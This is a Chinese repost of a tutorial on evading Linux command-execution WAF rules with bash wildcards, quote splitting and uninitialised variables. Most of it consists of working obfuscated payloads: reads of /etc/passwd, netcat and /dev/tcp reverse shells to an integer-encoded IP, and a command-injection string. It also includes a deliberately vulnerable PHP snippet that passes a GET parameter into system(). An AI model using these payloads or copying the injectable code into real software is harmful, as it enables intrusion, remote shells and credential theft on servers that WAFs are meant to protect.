【转】命令执行WAF绕过技巧总结-安全小百科

前言

如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力，这些WAF并不是想象中毫无破绽，当Web服务器是Linux平台时我们就可以利用一些技巧来绕过WAF规则集。本文主要总结Linux平台下针对RCE WAF的绕过技巧，Windows平台不在本文考虑范围内。

0×01 技巧一：通配符

在bash的操作环境中有一个非常有用的功能，那就是通配符，下面列出一些常用的通配符：

<br />
*    代表『 0 个到无穷多个』任意字符<br />
?    代表『一定有一个』任意字符<br />
[ ]    同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符， 可能是 a, b, c, d 这四个任何一个』<br />
[ – ]    若有减号在中括号内时，代表『在编码顺序内的所有字符』。例如 [0-9] 代表 0 到 9 之间的所有数字，因为数字的语系编码是连续的！<br />
[^ ]    若中括号内的第一个字符为指数符号 (^) ，那表示『反向选择』，例如 [^abc] 代表 一定有一个字符，只要是非 a, b, c 的其他字符就接受的意思。

* 代表『 0 个到无穷多个』任意字符

? 代表『一定有一个』任意字符

[ ] 同样代表『一定有一个在括号内』的字符(非任意字符)。例如 [abcd] 代表『一定有一个字符，可能是 a, b, c, d 这四个任何一个』

[ – ] 若有减号在中括号内时，代表『在编码顺序内的所有字符』。例如 [0–9] 代表 0 到 9 之间的所有数字，因为数字的语系编码是连续的！

[^ ] 若中括号内的第一个字符为指数符号 (^) ，那表示『反向选择』，例如 [^abc] 代表一定有一个字符，只要是非 a, b, c 的其他字符就接受的意思。

我们可以使用通配符来执行命令，例如执行命令：

<br />
ls -l<br />
使用通配符<br />
/?in/?s -l

ls –l

使用通配符

/?in/?s –l

读取/etc/passwd：

<br />
/???/??t /??c/p???w?<br />
有时候WAF不允许使用太多的?号<br />
/?in/cat /?tc/p?sswd

/???/??t /??c/p???w?

有时候WAF不允许使用太多的?号

/?in/cat /?tc/p?sswd

NC反弹shell：

<br />
nc -e /bin/bash 127.0.0.1 3737<br />
为了避免符号.我们可以将IP地址转换成整型。<br />
127.0.0.1 → 2130706433</p>
<p>使用通配符</p>
<p>root@kali:~# /??n/?c -e /??n/b??h 2130706433 3737

nc –e /bin/bash 127.0.0.1 3737

为了避免符号.我们可以将IP地址转换成整型。

127.0.0.1 → 2130706433

使用通配符

root@kali:~# /??n/?c -e /??n/b??h 2130706433 3737

0×02 技巧二：连接符

在bash的操作环境中还有一个非常有用的功能，那就是连接符，例如：

<br />
root@kali:~# echo hello<br />
hello<br />
root@kali:~# echo h’ello<br />
> ‘<br />
hello</p>
<p>root@kali:~# echo ‘h’ell’o’<br />
hello

root@kali:~# echo hello

hello

root@kali:~# echo h’ello

> ‘

hello

root@kali:~# echo ‘h‘ell’o‘

hello

你唯一需要注意的就是闭合，这点很重要，利用这个我们可以绕过一些匹配字符串的WAF规则。

读取/etc/passwd：

<br />
/’b’i’n’/’c’a’t’ /’e’t’c’/’p’a’s’s’w’d

1	/‘b’i‘n’/‘c’a‘t’ /‘e’t‘c’/‘p’a‘s’s‘w’d

获取shell

检测NC：

<br />
/’b’i’n’/’w’h’i’c’h’ ‘n’c

1	/‘b’i‘n’/‘w’h‘i’c‘h’ ‘n’c

没有NC的情况检查wget：

<br />
/’b’i’n’/’w’h’i’c’h’ ‘w’g’e’t

1	/‘b’i‘n’/‘w’h‘i’c‘h’ ‘w’g‘e’t

简单粗暴（容易被检查）：

<br />
bash -c ‘sh -i &>/dev/tcp/2130706433/3737 0>&1’

1	bash –c ‘sh -i &>/dev/tcp/2130706433/3737 0>&1’

其他字符：

<br />
双引号<br />
/”b”i”n”/”w”h”i”c”h” “n”c

1 2	双引号 /“b”i“n”/“w”h“i”c“h” “n”c

<br />
反斜杆<br />
/bin/which nc

1 2	反斜杆 /bin/which nc

0×03 技巧三：未初始化的bash变量

在bash环境中允许我们使用未初始化的bash变量，如何

<br />
$a,$b,$c

$a,$b,$c

我们事先并没有定义它们，输出看看：

<br />
root@kali:~# echo $a</p>
<p>root@kali:~# echo $b</p>
<p>root@kali:~# echo $c</p>
<p>root@kali:~#

root@kali:~# echo $a

root@kali:~# echo $b

root@kali:~# echo $c

root@kali:~#

未初始化的变量值都是null。

读取/etc/passwd：

<br />
cat$a /etc$a/passwd$a

1	cat$a /etc$a/passwd$a

测试WAF

测试代码：

<br />
<?php<br />
echo “OK”;<br />
system(‘dig ‘.$_GET[‘host’]);<br />
?>

<?php

echo “OK”;

system(‘dig ‘.$_GET[‘host’]);

<br />
www.baidu.com;$s/bin$s/which$s nc$s

1	www.baidu.com;$s/bin$s/which$s nc$s

反弹shell：

<br />
/bin$s/nc$s -e /bin$s/bash$s 2130706433 3737

1	/bin$s/nc$s –e /bin$s/bash$s 2130706433 3737

执行：

成功：

0×04 总结

本文我们主要利用了bash的通配符、连接符、未初始化的变量三个特性来绕过WAF规则，当然你可能有更好的办法，欢迎大家补充，最后感谢乐于分享的安全研究员们，没他们的分享也不会有这么多技巧出现，谢谢分享。

原文链接：http://www.freebuf.com/articles/web/185158.html

相关推荐: 火种CTF-writeup

暑期有空参加了火种CTF的比赛，比赛总的来说不是很难，但是web部分遇到了很多困难，不过cryto较为简单，全部做出来了。逆向是一如既往的放弃，我要开始好好学逆向了~ 附比赛的wp: 传送门：火种CTF-wp 相关推荐: python小脚本之VLSM计算今儿N…

文章版权归作者所有，未经允许请勿转载。

THE END